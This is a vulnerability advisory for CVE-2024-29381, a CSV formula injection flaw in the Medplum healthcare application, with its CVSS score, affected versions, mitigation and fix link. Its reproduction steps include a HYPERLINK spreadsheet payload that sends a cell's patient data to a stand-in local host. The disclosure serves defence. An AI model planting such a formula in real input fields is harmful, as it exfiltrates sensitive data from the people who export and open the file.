CVE Number

CVE-2024-29381

Loginsoft ID

Loginsoft-2024-1012

Description  

The application “Medplum” is affected by CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.

CWE

CWE-1236: Improper Neutralization of Formula Elements in a CSV File

Affected Versions

< v3.0.8

‍CVSS

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8(Medium)

Steps To Reproduce

1. Create a new patient with gender field having the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me") `.

2. Now Export patient data in CSV format.

3. Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.

4. Doing this exposes the sensitive data of the user located in cell F3.

Impact‍

Exposure of sensitive data.‍

Mitigation:

‍Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.

Fix

https://github.com/medplum/medplum/pull/4079  

Discovered Date

15 February 2024

Reported Date

19 February 2024

‍Patched Date

03 March 2024

‍Credit

Saharsh Agrawal